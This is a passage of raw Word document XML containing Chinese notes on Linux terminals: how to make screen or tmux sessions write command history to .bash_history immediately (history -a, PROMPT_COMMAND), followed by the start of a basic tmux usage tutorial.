      </w:r>
    </w:p>
    <w:p w14:paraId="02B927FF" w14:textId="30829C6F" w:rsidR="005F3F76" w:rsidRDefault="005F3F76" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>unrar x test.rar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC7267B" w14:textId="77777777" w:rsidR="005F3F76" w:rsidRDefault="005F3F76" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="353111FD" w14:textId="77777777" w:rsidR="005F3F76" w:rsidRDefault="005F3F76" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3018D903" w14:textId="77777777" w:rsidR="005F3F76" w:rsidRPr="005F3F76" w:rsidRDefault="005F3F76" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C0A8636" w14:textId="77777777" w:rsidR="00E759DF" w:rsidRDefault="00E759DF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48FB76CD" w14:textId="77777777" w:rsidR="00E759DF" w:rsidRDefault="00E759DF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C9E150E" w14:textId="77777777" w:rsidR="00E759DF" w:rsidRDefault="00E759DF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CC18709" w14:textId="77777777" w:rsidR="00E759DF" w:rsidRDefault="00E759DF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A90F811" w14:textId="1288E751" w:rsidR="004E5F9B" w:rsidRDefault="004E5F9B" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="224" w:name="_Toc159779684"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>screen</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的命令不会立即出现在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t>bash_history</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中</w:t>
      </w:r>
      <w:bookmarkEnd w:id="224"/>
    </w:p>
    <w:p w14:paraId="721B982C" w14:textId="77777777" w:rsidR="004E5F9B" w:rsidRDefault="004E5F9B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42441DF1" w14:textId="77777777" w:rsidR="008025A1" w:rsidRDefault="008025A1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> screen </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> tmux </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会话中执行的命令可能不会立即出现在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> .bash_history </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件中，这是因为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Bash shell </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>默认是在会话结束时将命令历史写入到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> .bash_history </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件中的。也就是说，只有当你退出</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> screen </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> tmux </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会话（或者更具体地说，是退出</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Bash shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）时，才会将命令历史写入到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> .bash_history </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件中。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A3D6D5C" w14:textId="77777777" w:rsidR="008025A1" w:rsidRDefault="008025A1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31992EDA" w14:textId="77777777" w:rsidR="008025A1" w:rsidRDefault="008025A1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果你想在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> screen </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> tmux </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会话中执行的命令立即写入到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> .bash_history </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件中，你可以试试下面的方法：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA71F29" w14:textId="77777777" w:rsidR="008025A1" w:rsidRDefault="008025A1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12634A0E" w14:textId="77777777" w:rsidR="008025A1" w:rsidRDefault="008025A1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在你的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Bash shell </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中，执行</w:t>
      </w:r>
      <w:r w:rsidRPr="000F5F94">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000F5F94">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="002060"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>history -a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令。</w:t>
      </w:r>
      <w:r w:rsidRPr="00091351">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>这个命令会将当前会话的命令历史追加到</w:t>
      </w:r>
      <w:r w:rsidRPr="00091351">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> .bash_history </w:t>
      </w:r>
      <w:r w:rsidRPr="00091351">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>文件中。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="061CAC9E" w14:textId="77777777" w:rsidR="008025A1" w:rsidRDefault="008025A1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1516DF5A" w14:textId="77777777" w:rsidR="008025A1" w:rsidRDefault="008025A1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>你可以在你的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> ~/.bashrc </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> ~/.bash_profile </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件中添加以下内容，这样每次执行命令后，命令就会立即写入到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> .bash_history </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件中：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29832AC8" w14:textId="77777777" w:rsidR="008025A1" w:rsidRDefault="008025A1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="280CFF24" w14:textId="77777777" w:rsidR="008025A1" w:rsidRDefault="008025A1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A4E2AB" w14:textId="77777777" w:rsidR="008025A1" w:rsidRDefault="008025A1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="719884BF" w14:textId="77777777" w:rsidR="008025A1" w:rsidRDefault="008025A1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="000824A5">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>export PROMPT_COMMAND="history -a; $PROMPT_COMMAND"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0329904C" w14:textId="77777777" w:rsidR="008025A1" w:rsidRDefault="008025A1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C915F4A" w14:textId="77777777" w:rsidR="008025A1" w:rsidRDefault="008025A1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这行命令的意思是在每次命令提示符（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>prompt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）出现之前，都执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> history -a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令。这样，无论你是在普通的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Bash shell </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中，还是在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> screen </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> tmux </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会话中，每次执行命令后，命令都会立即写入到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> .bash_history </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件中。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2001961E" w14:textId="77777777" w:rsidR="008025A1" w:rsidRDefault="008025A1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34C4DFE1" w14:textId="17BFEA25" w:rsidR="004E5F9B" w:rsidRDefault="008025A1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注意：</w:t>
      </w:r>
      <w:r w:rsidRPr="00E30211">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>如果你在多个</w:t>
      </w:r>
      <w:r w:rsidRPr="00E30211">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> Bash shell </w:t>
      </w:r>
      <w:r w:rsidRPr="00E30211">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>中同时执行命令，这些修改可能会导致</w:t>
      </w:r>
      <w:r w:rsidRPr="00E30211">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> .bash_history </w:t>
      </w:r>
      <w:r w:rsidRPr="00E30211">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>文件中的命令出现混乱。因为每个</w:t>
      </w:r>
      <w:r w:rsidRPr="00E30211">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> Bash shell </w:t>
      </w:r>
      <w:r w:rsidRPr="00E30211">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>都会将自己的命令历史追加到</w:t>
      </w:r>
      <w:r w:rsidRPr="00E30211">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> .bash_history </w:t>
      </w:r>
      <w:r w:rsidRPr="00E30211">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>文件中，而不会考虑其他</w:t>
      </w:r>
      <w:r w:rsidRPr="00E30211">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> Bash shell </w:t>
      </w:r>
      <w:r w:rsidRPr="00E30211">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>的命令历史。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09688A5E" w14:textId="77777777" w:rsidR="004E5F9B" w:rsidRDefault="004E5F9B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F52B054" w14:textId="5EA6BC72" w:rsidR="002710EC" w:rsidRDefault="002710EC" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="225" w:name="_Toc159779685"/>
      <w:r>
        <w:t>tmux:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类似于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>screen</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的虚拟终端</w:t>
      </w:r>
      <w:bookmarkEnd w:id="225"/>
    </w:p>
    <w:p w14:paraId="3D9F161C" w14:textId="77777777" w:rsidR="002710EC" w:rsidRDefault="002710EC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25992748" w14:textId="77777777" w:rsidR="00DF66A8" w:rsidRPr="00DF66A8" w:rsidRDefault="00DF66A8" w:rsidP="009222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DF66A8">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>$ tmux new -s &lt;session-name&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33CBADB1" w14:textId="77777777" w:rsidR="002710EC" w:rsidRPr="00DF66A8" w:rsidRDefault="002710EC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BFD7255" w14:textId="77777777" w:rsidR="00B035B5" w:rsidRDefault="00B035B5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="36"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>、背景</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2517FC00" w14:textId="77777777" w:rsidR="00B035B5" w:rsidRDefault="00B035B5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>之前习惯使用</w:t>
      </w:r>
      <w:r>
        <w:t>screen</w:t>
      </w:r>
      <w:r>
        <w:t>，由于</w:t>
      </w:r>
      <w:r>
        <w:t>tqdm</w:t>
      </w:r>
      <w:r>
        <w:t>显示问题，使用</w:t>
      </w:r>
      <w:r>
        <w:t>screen</w:t>
      </w:r>
      <w:r>
        <w:t>会导致进度条样式错乱，网上也没找到解决方案，这里推荐使用</w:t>
      </w:r>
      <w:r>
        <w:t>tmux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B20885" w14:textId="77777777" w:rsidR="00B035B5" w:rsidRDefault="00B035B5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="242B4CAA" w14:textId="34EA4050" w:rsidR="00B035B5" w:rsidRDefault="00B035B5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>、用法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C28E63B" w14:textId="77777777" w:rsidR="00B035B5" w:rsidRDefault="00B035B5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.1 </w:t>
      </w:r>
      <w:r>
        <w:t>新建会话</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3815426C" w14:textId="77777777" w:rsidR="00B035B5" w:rsidRDefault="00B035B5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>第一个启动的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Tmux </w:t>
      </w:r>
      <w:r>
        <w:t>窗口，编号是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>，第二个窗口的编号是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>，以此类推。这些窗口对应的会话，就是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 0 </w:t>
      </w:r>
      <w:r>
        <w:t>号会话、</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">1 </w:t>
      </w:r>
      <w:r>
        <w:t>号会话。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A1ECAC" w14:textId="77777777" w:rsidR="00B035B5" w:rsidRDefault="00B035B5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>使用编号区分会话，不太直观，更好的方法是为会话起名。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3901483E" w14:textId="77777777" w:rsidR="00B035B5" w:rsidRDefault="00B035B5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="005E36DD">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>$ tmux new -s &lt;session-name&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013D507D" w14:textId="77777777" w:rsidR="00B035B5" w:rsidRDefault="00B035B5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>上面命令新建一个指定名称的会话。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28457659" w14:textId="77777777" w:rsidR="00B035B5" w:rsidRDefault="00B035B5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.2 </w:t>
      </w:r>
      <w:r>
        <w:t>分离会话</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD9EAE2" w14:textId="77777777" w:rsidR="00B035B5" w:rsidRDefault="00B035B5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Tmux </w:t>
      </w:r>
      <w:r>
        <w:t>窗口中，按下</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>Ctrl+b d</w:t>
      </w:r>
      <w:r>
        <w:t>或者输入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>tmux detach</w:t>
      </w:r>
      <w:r>
        <w:t>命令，就会将当前会话与窗口分离。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4214A812" w14:textId="77777777" w:rsidR="00B035B5" w:rsidRDefault="00B035B5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>$ tmux detach</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D809311" w14:textId="77777777" w:rsidR="00B035B5" w:rsidRDefault="00B035B5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>上面命令执行后，就会退出当前</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Tmux </w:t>
      </w:r>
      <w:r>
        <w:t>窗口，但是会话和里面的进程仍然在后台运行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3896D123" w14:textId="77777777" w:rsidR="00B035B5" w:rsidRDefault="00B035B5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>tmux ls</w:t>
      </w:r>
      <w:r>
        <w:t>命令可以查看当前所有的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Tmux </w:t>
      </w:r>
      <w:r>
        <w:t>会话。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE1FD04" w14:textId="77777777" w:rsidR="00B035B5" w:rsidRDefault="00B035B5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>$ tmux ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B43900" w14:textId="77777777" w:rsidR="00B035B5" w:rsidRDefault="00B035B5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t># or</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20FB97D5" w14:textId="77777777" w:rsidR="00B035B5" w:rsidRDefault="00B035B5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>$ tmux list-session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EFC9041" w14:textId="77777777" w:rsidR="00B035B5" w:rsidRDefault="00B035B5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.3 </w:t>
      </w:r>
      <w:r>
        <w:t>接入会话</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A37118F" w14:textId="77777777" w:rsidR="00B035B5" w:rsidRDefault="00B035B5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>tmux attach</w:t>
      </w:r>
      <w:r>
        <w:t>命令用于重新接入某个已存在的会话。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA99634" w14:textId="77777777" w:rsidR="00B035B5" w:rsidRDefault="00B035B5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:t>使用会话编号</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF44160" w14:textId="77777777" w:rsidR="00B035B5" w:rsidRDefault="00B035B5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">$ tmux attach -t 0# </w:t>
      </w:r>
      <w:r>
        <w:t>使用会话名称</w:t>
      </w:r>
